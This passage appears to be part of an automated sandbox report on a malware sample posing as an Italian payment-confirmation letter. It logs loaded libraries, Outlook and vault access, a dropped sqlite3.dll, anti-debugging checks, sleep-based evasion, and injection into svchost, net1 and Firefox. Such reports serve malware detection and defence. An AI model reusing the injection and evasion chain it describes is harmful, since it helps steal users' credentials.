            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic file information: File size 1170944 > 1048576
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: net1.pdb source: svchost.exe, 00000002.00000002.419501407.0000000000346000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.419501407.0000000000324000.00000004.00000020.00020000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.626998389.0000000000940000.00000004.00000020.00020000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.626998389.0000000000914000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000003.355344717.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000003.354380243.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.401261747.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.419535822.0000000000740000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.419535822.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.400899262.0000000000450000.00000004.00000020.00020000.00000000.sdmp, net1.exe, 00000004.00000003.419809000.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, net1.exe, 00000004.00000002.627106356.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, net1.exe, 00000004.00000002.627106356.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, net1.exe, 00000004.00000003.419508364.0000000000760000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: net1.pdbN source: svchost.exe, 00000002.00000002.419501407.0000000000346000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.419501407.0000000000324000.00000004.00000020.00020000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.626998389.0000000000940000.00000004.00000020.00020000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.626998389.0000000000914000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: net1.exe, 00000004.00000002.627315561.000000000130C000.00000004.10000000.00040000.00000000.sdmp, net1.exe, 00000004.00000002.626998866.000000000068C000.00000004.00000020.00020000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000002.627266394.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.482046973.00000000015AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rGdWid9z.exe, 00000003.00000002.626883011.000000000020F000.00000002.00000001.01000000.00000004.sdmp, BupJjuMCJB.exe, 00000005.00000002.627216674.000000000104F000.00000002.00000001.01000000.00000005.sdmp
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: sqlite3.dll.4.drStatic PE information: section name: /4
            Source: sqlite3.dll.4.drStatic PE information: section name: /19
            Source: sqlite3.dll.4.drStatic PE information: section name: /31
            Source: sqlite3.dll.4.drStatic PE information: section name: /45
            Source: sqlite3.dll.4.drStatic PE information: section name: /57
            Source: sqlite3.dll.4.drStatic PE information: section name: /70
            Source: sqlite3.dll.4.drStatic PE information: section name: /81
            Source: sqlite3.dll.4.drStatic PE information: section name: /92
            Source: C:\Windows\SysWOW64\net1.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeAPI/Special instruction interceptor: Address: 72D71C
            Source: C:\Windows\SysWOW64\net1.exeWindow / User API: threadDelayed 9832Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\net1.exe TID: 3616Thread sleep count: 129 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exe TID: 3616Thread sleep time: -258000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\net1.exe TID: 3676Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\net1.exe TID: 3616Thread sleep count: 9832 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exe TID: 3616Thread sleep time: -19664000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\net1.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\net1.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeSection loaded: NULL target: C:\Windows\SysWOW64\net1.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: NULL target: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: NULL target: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeThread APC queued: target process: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe"Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeProcess created: C:\Windows\SysWOW64\net1.exe "C:\Windows\SysWOW64\net1.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: rGdWid9z.exe, 00000003.00000000.403059453.0000000000B80000.00000002.00000001.00040000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.627042938.0000000000B80000.00000002.00000001.00040000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000000.434017018.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: rGdWid9z.exe, 00000003.00000000.403059453.0000000000B80000.00000002.00000001.00040000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.627042938.0000000000B80000.00000002.00000001.00040000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000000.434017018.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
